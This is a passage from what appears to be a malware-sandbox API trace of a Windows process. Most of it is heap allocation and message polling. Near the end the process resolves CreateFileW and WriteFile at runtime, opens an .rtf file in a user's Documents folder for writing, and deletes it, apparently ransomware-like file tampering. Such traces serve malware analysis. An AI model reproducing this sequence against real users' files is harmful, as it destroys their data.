(HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd738 [0177.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0177.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd348 [0177.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd618 [0177.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba378 [0177.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba618 [0177.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0177.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda08 [0177.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda38 [0177.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0177.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0177.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0177.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda50 [0177.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0177.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0177.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0177.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0177.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0177.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0177.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0177.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0177.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0177.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0177.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0177.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0177.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0177.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0177.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0177.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.783] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0177.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0177.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0177.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0177.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.787] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0177.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0177.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0177.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0177.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.787] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0177.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0177.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0177.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0177.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.788] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.788] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.788] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.788] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.788] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0177.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.788] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0177.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.789] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0177.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.789] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0177.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.789] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0177.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0177.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0177.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0177.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.789] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0177.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0177.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0177.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0177.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0177.789] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0177.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0177.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5b8 [0177.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd5b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0177.790] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\f2lgxu.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0177.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0177.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0177.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0177.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0177.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0177.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0177.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0177.790] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.791] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0177.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0177.791] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.791] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0177.791] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0177.791] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0177.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0177.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0177.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0177.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0177.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0177.791] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0177.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0177.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0177.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0177.791] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0177.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0177.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd7e0 [0177.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd7e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0177.793] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.793] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0177.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0177.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0177.793] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.793] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.793] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.793] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0177.793] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.793] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.793] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.794] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.794] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.794] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.794] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.794] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf", lpFilePart=0x0) returned 0x42 [0177.795] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd471860, ftCreationTime.dwHighDateTime=0x1d5e4c0, ftLastAccessTime.dwLowDateTime=0xe53b1530, ftLastAccessTime.dwHighDateTime=0x1d5e177, ftLastWriteTime.dwLowDateTime=0xf4d1a00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x15e3b, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="f2lgxu.rtf", cAlternateFileName="")) returned 0x90ae18 [0177.796] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\f2lgxu.rtf")) returned 1 [0177.798] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd471860, ftCreationTime.dwHighDateTime=0x1d5e4c0, ftLastAccessTime.dwLowDateTime=0xe53b1530, ftLastAccessTime.dwHighDateTime=0x1d5e177, ftLastWriteTime.dwLowDateTime=0xf4d1a00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x15e3b, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="f2lgxu.rtf", cAlternateFileName="")) returned 0 [0177.798] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0177.798] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.799] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.799] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0177.799] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0177.799] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.799] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.799] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.799] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.799] CreateFileW 